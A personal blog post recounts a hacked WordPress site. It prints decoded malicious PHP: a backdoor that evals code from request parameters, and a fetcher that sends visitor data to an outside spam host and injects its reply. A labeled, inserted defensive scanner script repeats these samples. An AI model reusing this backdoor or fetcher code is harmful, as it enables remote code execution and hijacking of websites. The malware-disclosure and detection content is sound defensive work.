The Fortune Cookie Chronicles



I was hacked (with WordPress footer spam) but now am saved

By Jennifer 8. Lee | August 23, 2008

In poking around my blog because of layout issues, we discovered I had a bunch of spam links in my footer. Like a hundred links to latech.edu, with horrible things like cialis and viagra. About a month ago, I started noticing some very strange search queries bringing people to my site, like "pantyhose" and things I can't write here (sexual acts, anatomy, fluids and so on). I was perplexed. I didn't use these terms. What was going on?

So today it all became clear. It turned out I had been hacked, perhaps through some WordPress vulnerability. I felt really violated.

Anyway, in my templates: when I looked in my header.php file in WordPress, I was horrified to find something that started with this:

<?php eval(base64_decode("aWYoQCRfUkVRVUVTVFsiQSJdID09ICJiIiBhbmQ…

That is base64, an encoding that turns ordinary text into gibberish (base64_decode turns it back). Decoded, it became this:

// Backdoor: any request with A=b runs whatever PHP code is sent in the C parameter.
if(@$_REQUEST["A"] == "b" and isset($_REQUEST["C"])) eval(stripslashes(stripslashes($_REQUEST["C"])));

Which was totally sketchy. I also found another one, which I couldn't decompress by myself:

<?eval(gzuncompress(base64_decode('eJx1kMFqwzAMhl/FE2bEEJz0NmZCF6hp…

That came to this:

$path="/blog";
// Open a plain HTTP connection to the spammer's server and tell it who is visiting:
// the visitor's user agent, IP address, this site's hostname and the blog path.
@$s = fsockopen("pub.supercyborg.info", 80);
fputs($s, "GET /c/check.php?ua=".urlencode($_SERVER["HTTP_USER_AGENT"])
    ."&ra=".urlencode($_SERVER["REMOTE_ADDR"])
    ."&sn=".urlencode($_SERVER["SERVER_NAME"])
    ."&path=".urlencode($path)." HTTP/1.0\nHost: pub.supercyborg.info\n\n");
// Read the whole response, split off the HTTP headers, and print the body
// (whatever the remote server chose to send) into the page.
while(!feof($s)) $o.=fgets($s,1000);
$o=split("\r?\n\r?\n",$o);
echo $o[1];
fclose($s);

I removed these and the spam was still there! I also switched themes, and it was still there. So it had to be in the WordPress files themselves.

And we had just done a WordPress upgrade, so all of the files had been recently updated; we couldn't look at timestamps to figure out which files had been touched. But you could do a search for the base64 phrase. It turned out that some of the WordPress files themselves had been infected, like wp-functions.php, and another one of my files, template-functions-comments.php, was the one with all the bad things in it.
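A scanner that does that search programmatically, as an added example that is not from this post or from WordPress: it walks a tree of .php files, matches the two wrappers quoted above (eval(base64_decode("...")) and eval(gzuncompress(base64_decode('...')))), decodes each payload (base64, then zlib for the gzuncompress variant, since PHP's gzuncompress() reads zlib-format data) and flags any decoded payload that contains $_REQUEST, eval( or fsockopen. The sample site it scans is constructed inside the script: the file names come from the post, but the file contents and the hostname spam-host.example are made up for the demonstration, so nothing is fetched from the network.

```python
import base64
import os
import re
import sys
import tempfile
import zlib

# The two wrappers seen in the infected files: eval(base64_decode("...")) and
# eval(gzuncompress(base64_decode('...'))). The base64 may be wrapped across lines.
WRAPPER_RE = re.compile(
    r"eval\s*\(\s*(?P<gz>gzuncompress\s*\(\s*)?base64_decode\s*\(\s*"
    r"['\"](?P<b64>[A-Za-z0-9+/=\s]+)['\"]\s*\)",
    re.IGNORECASE,
)

# Things a decoded payload should never contain in a theme or core file.
INDICATORS = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE", "eval(", "fsockopen", "curl_exec")


def decode_payload(b64, gz=False):
    """Undo the obfuscation: base64, then zlib (PHP's gzuncompress reads zlib format)."""
    raw = base64.b64decode(re.sub(r"\s+", "", b64))
    if gz:
        raw = zlib.decompress(raw)
    return raw.decode("utf-8", errors="replace")


def scan_file(path):
    """Return one finding per obfuscated eval() found in a PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = []
    for m in WRAPPER_RE.finditer(text):
        gz = m.group("gz") is not None
        try:
            payload = decode_payload(m.group("b64"), gz)
        except (ValueError, zlib.error) as exc:
            payload = "<could not decode: %s>" % exc
        findings.append({
            "file": path,
            "line": text.count("\n", 0, m.start()) + 1,
            "gz": gz,
            "payload": payload,
            "indicators": [i for i in INDICATORS if i in payload],
        })
    return findings


def scan_tree(root):
    """Walk a directory tree and scan every .php file."""
    results = []
    for dirpath, _dirs, names in os.walk(root):
        for name in sorted(names):
            if name.lower().endswith(".php"):
                results.extend(scan_file(os.path.join(dirpath, name)))
    return results


# --- constructed sample site (made-up contents, file names from the post) ---

# The backdoor quoted in the post, and a stand-in for the remote fetcher that
# uses a made-up hostname instead of the real one.
BACKDOOR = ('if(@$_REQUEST["A"] == "b" and isset($_REQUEST["C"])) '
            'eval(stripslashes(stripslashes($_REQUEST["C"])));')
FETCHER = ('$path="/blog";@$s = fsockopen("spam-host.example",80);'
           'fputs($s,"GET /c/check.php?ua=".urlencode($_SERVER["HTTP_USER_AGENT"])." HTTP/1.0\\n\\n");')


def build_sample_site():
    """Create a throwaway tree with two clean files and two infected ones."""
    root = tempfile.mkdtemp(prefix="wp-scan-")
    b64_plain = base64.b64encode(BACKDOOR.encode()).decode()
    b64_gz = base64.b64encode(zlib.compress(FETCHER.encode())).decode()
    files = {
        "wp-config-sample.php": "<?php define('DB_NAME', 'wordpress'); ?>\n",
        "wp-includes/functions.php": "<?php function wp_hello() { return 'hi'; } ?>\n",
        "wp-content/themes/t/header.php":
            '<?php eval(base64_decode("%s")); ?>\n<html><head></head>\n' % b64_plain,
        "wp-content/themes/t/template-functions-comments.php":
            "<?eval(gzuncompress(base64_decode('%s')));?>\n" % b64_gz,
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    # With no argument, scan the constructed sample; otherwise scan the given install.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_site()
    for f in scan_tree(target):
        tag = ("gz+" if f["gz"] else "") + (",".join(f["indicators"]) or "no indicators")
        print("%s:%d %s" % (f["file"], f["line"], tag))
        print("    " + f["payload"][:160])
```

Run it with the path of a real WordPress install as the only argument; the quick manual version of the same search is grep -r 'eval(base64_decode' on the document root. Treat hits as leads rather than verdicts, since a few legitimate plugins do use base64_decode, and read the decoded payload before deleting anything. As the post shows, removing the snippets is not enough on its own: the wrappers were also sitting in core and template files, so after cleaning, replace the core files from a fresh WordPress download, change the admin and database passwords, and rerun the scan.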

(blah). But luckily I have adorable, high-quality tech help, which purged it for me. I'm eternally grateful!

Topics: Blogging Musings, Chinese Food